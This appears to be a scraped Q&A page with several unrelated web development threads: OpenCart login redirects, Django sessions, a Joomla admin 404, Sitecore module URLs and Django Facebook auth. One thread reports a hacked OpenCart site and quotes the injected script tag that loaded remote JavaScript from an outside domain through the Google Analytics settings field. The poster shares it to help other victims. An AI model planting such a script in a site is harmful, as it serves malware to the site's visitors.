Customer Logged in condition is not working in Hostgator server - opencart

I am developing OpenCart 3.0.8 Website. I want to restrict to show cart page without customer login. I have added the following condition in catalog/controller/checkout/cart.php to do that.
if($this->customer->isLogged()) {
if ($this->cart->hasProducts() || !empty($this->session->data['vouchers'])) {......
}
else
{
$this->response->redirect($this->url->link('account/login'));
}
In my system , it is working good. Once I click without log in it moving to login page otherwise it showing cart. But in hostgator, when I click cart it goes to accounts page even after logged in. This looks weird to me.
I have checked with Hostgator support, they said all the required extensions are installed correctly.
Curl, ZIP, Zlib, GD Library, Mcrypt, Mbstrings, Xml
In both local and hostgator server, PHP 7.4 release is used. There is no error logs appearing. Can anyone please suggest any possibilities to fix this error?
Thanks

Yes. Found the answer. Instead of just using if($this->customer->isLogged()) ,change the code as below.
if (!$this->customer->isLogged()) {
$this->session->data['redirect'] = $this->url->link('checkout/cart', '', true);
$this->response->redirect($this->url->link('account/login', '', true));
}
Thanks

Related

Can't remove a "security" folder from the server via FTP

I currently host a website on Hostgator. My site redirects to an Adobe Flash Update automatically. I contacted support at Hostgator and they did not want to help, they said I need to contact sitelock to remove the malware is causing the redirection.
I ftp in to the server and found there is a ".security" folder which seems to be the cause of the problem. It has some zip files and other php files. I cannot change its permissions nor delete it.
Does anyone knows how can I remove this malware from the server? Any help is welcome thank you.
In reference to my last issue with Hostgator and a Malware site.
The site was running OpenCart and I found that the origin of the problem was within the back end of OpenCart, specifically under Settings > Server > Google Analytics Code with a suspicious domain in the text area.
`<!-- startgoogle -->
<script src="http://nam.su/google2"></script>
<!-- endgoogle --></head>`
Whoever did this to the site was able to login and manually enter the script in the poorly escaped and sanitize text area. Therefore making a mess. I just hope that I don't get banned from this site for publishing the link above but I think that someone may come across a similar problem and find this 'honest' mistake, useful. I am also interested in what's wrong with OpenCart's textarea.

Django authentication works on Chrome, but not on Firefox

I'm having a problem where Django's login is working okay on Chrome but not on Firefox: when trying to login to a restricted portion of the site on Firefox, it simply loops back again and again to the login page; furthermore, no error message appears on the log regarding that.
Interestingly, the error doesn't happen when the server is on the local machine.
Does someone have a general idea of what could be causing that strange behavior?
I'm using Django 1.6 on Python 2.7
this isn't much of an answer, but a linking to other similar problems. Because I don't have rep, all I can do is leave an answer.
A issue like this was encountered in 2012 but was never conclusively answered:
Django session doesn't work in Firefox
A similar question where the user could login via local server but not remote firefox was encoutered:
Unable log in to the django admin page with a valid username and password
The second was very well documented and had an accepted answer that was well liked.
Recommendations:
If you are not using https make sure you have this setting SESSION_COOKIE_SECURE = False.
If you are using a database backed, Check if the session is actually being created in the django_sessions table .
If you are using a cached backed, check that SESSION_ENGINE is django.contrib.sessions.backends.cache and that CACHE_BACKEND is properly configured.

Joomla 2.5 admin page 404

Web site functioned normally , I tried to login to admin page and suddenly when I access admin page it display:
404 - An error has occurred.
Component not found
No new extension/module/component and theme has been installed.
No changes on PHP or mysql on the server side. ( I did check with hosting providers).
It's like it works today and tomorrow when you want to login , you'll see the above mentioned error.
Renaming .htaccess did not solve the issue.
Restoring DB backup did not solve the issue.
I checked the Joomla logs ( in log folder) there isn't any related report.
Joomla version info:
$RELEASE = '2.5';
$DEV_LEVEL = '16';
Please help!
I managed to sloved this long time ago but I forgot to update!
It is solved by running repair and optimize operations on the database via phpmyadmin.

Can't Open Web forms for marketers Form Designer or Security Manager

I have had WFFM running on a Sitecore instance for a while, but it has recently stopped working. When I go to "Form Designer" on an existing form, I get the standard Sitecore "The requested document was not found" page.
Requested URL: /applications/modules/web
User Name: sitecore\admin
Site Name: shell
If the page you are trying to display exists, please check that an
appropriate prefix has been added to the IgnoreUrlPrefixes setting in
the web.config.
Note that the requested URL is stated as /applications/modules/web instead of /applications/modules/web forms for marketers.
A lot of development has occurred on this site recently, so I'm not sure when exactly this started happening.
Additional: info:
Folder and file permissions are correct.
I've tried reinstalling the WFFM package, and made sure that all the files are in place.
Several processors have been added to the HttpBeginRequest pipeline, but I removed them all to test if they were the cause - they weren't.
I haven't upgraded Sitecore since WFFM was working and the version is correct.
No errors are logged
EDIT
This also seems to be affecting the Sitecore Security Editor:
Requested URL: /appl
User Name: sitecore\admin
Site Name: shell
If the page you are trying to display exists, please check that an
appropriate prefix has been added to the IgnoreUrlPrefixes setting in
the web.config.
EDIT 2
Further investigation with this is making me think it is related to the Requested URL. I originally thought the the "Not found" page was displaying the requested url incorrectly. However, if I attempt to goto mysite.com/sitecore/shell/applications/fake folder with spaces/fake page with spaces I get this error message:
Requested URL: /applications/fake folder with spaces/fake page with
spaces
User Name: sitecore\admin
Site Name: shell
If the page you are trying to display exists, please check that an
appropriate prefix has been added to the IgnoreUrlPrefixes setting in
the web.config.
As you can see the Requested Url is correct in the error message. So in relation to my problem, I think maybe Sitecore is requesting the wrong URL in the first place.
Additionally if I go to the go the following url by typing directly into the browser, then the Security Editor opens as expected:
mysite.com/sitecore/shell/Applications/Security/User-Editor
This is quite old now but I thought I'd provide an update for anyone else who encounters the problem.
Unfortunately, Sitecore support weren't able to help beyond pointing out that setting the addAspxExtension attribute to 'true' in the link provider seemed to solve the problem. This may have been acceptable except that extensionless URLs were important to the customer.
In the end I had to amend my link provider so that addAspxExtension is set to 'true' in the web config, and then I set it to false inside the GetItemUrl method for specified sites only.
So now whenever the context site is 'Shell' or 'Admin' etc, the extensions are added by default, but switched off in my main website.
Of course, this is a work around. I still don't know how to actually fix the problem
So the first thing that I am going to tell you is that I suspect that there is something wrong with your site declaration for Sitecore Modules. In your web.config, there's a site declaration for "modules_shell" and "modules_website". Those are where the code files that run the modules are usually located... a shell folder to run the parts that run in the Sitecore shell and a web folder to run the part that is accessed by the externally facing site. Please check your site declarations (and the form.config file) to make sure that you're not in live mode or something like that. I would definitely say that this is where you should start looking.
The next thing is to say that your comments about Sitecore not serving a url in the /sitecore/shell directory is really not surprising. Sitecore processes all requests unless you specifically tell it to ignore requests (like setting it in the IgnoreUrlPrefixes in web.config), it's going to try processing it. Like going to /sitecore/shell/applications gives me a layout error because it doesn't have anything set to handle that request. Now your error suggests that there is something wrong with Site declarations.. however, even if they were all right, it still wouldn't work.

No Facebook login screen in django social auth

I am trying to build a small page using django which uses a facebook login, and I am using the django-social-auth package from agiliq: https://github.com/agiliq/Django-Socialauth and trying to follow the documentation.
However, I am not able to see/test the login from facebook.
The settings.py and urls.py can be found here: http://dpaste.com/685141/
When I go to: 127.0.0.1:8000/login/facebook I get the following error from facebook:
f Error:
An error occurred. Please try later
where, f is the facebook sprite.
As I understand, I think I need to specify the redirect url (?) but I am not entirely sure how to go about doing this.
Don't confuse django-socialauth with django-social-auth, they try to solve the same but on quite different ways.
Well First of all I don't see the SOCIAL_AUTH_ENABLED_BACKENDS setting
mine is like this:
SOCIAL_AUTH_ENABLED_BACKENDS = ('twitter','facebook','google')
Also be advised that facebook will never return an ok state for a remote url that does not match the domain name you said you had in your app.
So localhost != domain name is not cool to them.
also I'd advise if you took down your dpaste because your keys, email and root password are exposed.